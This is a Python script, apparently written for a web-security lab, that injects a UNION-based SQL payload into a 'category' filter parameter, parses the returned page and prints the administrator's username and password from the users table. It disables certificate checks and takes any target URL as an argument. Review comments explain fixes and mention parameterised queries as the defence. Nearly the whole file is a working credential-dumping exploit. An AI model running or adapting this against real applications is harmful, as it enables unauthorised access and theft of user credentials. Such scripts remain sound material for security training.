import requests
import urllib3
import sys
from bs4 import BeautifulSoup
import re
# Silence urllib3's InsecureRequestWarning, which is otherwise emitted for each
# HTTPS request made with certificate verification switched off (verify=False).
urllib3.disable_warnings(category=urllib3.exceptions.InsecureRequestWarning)

# Loopback address on port 8080 -- presumably a local intercepting proxy.
# NOTE(review): nothing visible in this file passes `proxies` to requests, so
# the mapping currently has no effect on the traffic; confirm whether that is
# intended.
proxies = dict(https='127.0.0.1:8080')
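def exploit_table(url):
    """Query the lab's category filter with a UNION payload and print the administrator row.

    The payload closes the string literal of the ``category`` parameter and
    appends a ``UNION select`` that concatenates ``username`` and ``password``
    from the ``users`` table into one column, separated by ``-``. It only has
    an effect when the application builds its query by string concatenation;
    a parameterized query treats the whole value as data.

    Args:
        url: Base URL of the lab application, with or without a trailing slash.

    Returns:
        True when the response body contains "administrator", otherwise False.

    Raises:
        requests.exceptions.RequestException: if the request fails or times out.
    """
    uri = "filter?category=Pets"
    sql_payload = "'UNION select NULL,username || '-' ||password from users--"

    # Join base URL and path with exactly one slash so "host" and "host/" both work.
    target = url.rstrip('/') + '/' + uri + sql_payload

    # verify=False disables TLS certificate validation for this request.
    # The timeout keeps the script from hanging on an unresponsive host.
    r = requests.get(target, verify=False, timeout=10)
    res = r.text

    if "administrator" not in res:
        return False

    soup = BeautifulSoup(res, 'html.parser')
    # The previous filter was re.compile(...).split("-"), which evaluates to the
    # list ['-'] and therefore never matched the administrator cell. Match on the
    # pattern first, then split the cell text into username and password.
    # Assumes the injected column is rendered in <th> cells, as the original
    # selector did -- confirm against the page markup.
    cells = soup.find_all('th', string=re.compile('administrator.*'))
    # maxsplit=1: a password that itself contains "-" stays in one piece.
    columns = [cell.get_text().split("-", 1) for cell in cells]
    print(columns)
    return True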
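if __name__ == "__main__":
    # The script reads exactly one argument, the base URL of the lab
    # application; the SQL payload is fixed inside exploit_table(), so the
    # usage text no longer advertises a second argument.
    try:
        url = sys.argv[1].strip()
    except IndexError:
        print('[-] Usage: %s <url>' % sys.argv[0])
        # requests needs a URL with a scheme; the trailing slash keeps the
        # path join in exploit_table() well-formed.
        print('[-] Example: %s https://www.example.com/' % sys.argv[0])
        sys.exit(-1)

    # exploit_table() does not count columns; it reads rows from the users table.
    print("[+] Retrieving usernames and passwords from the users table.")
    if exploit_table(url):
        print("SUCCESS!!!")
    else:
        print("FAILURE!!")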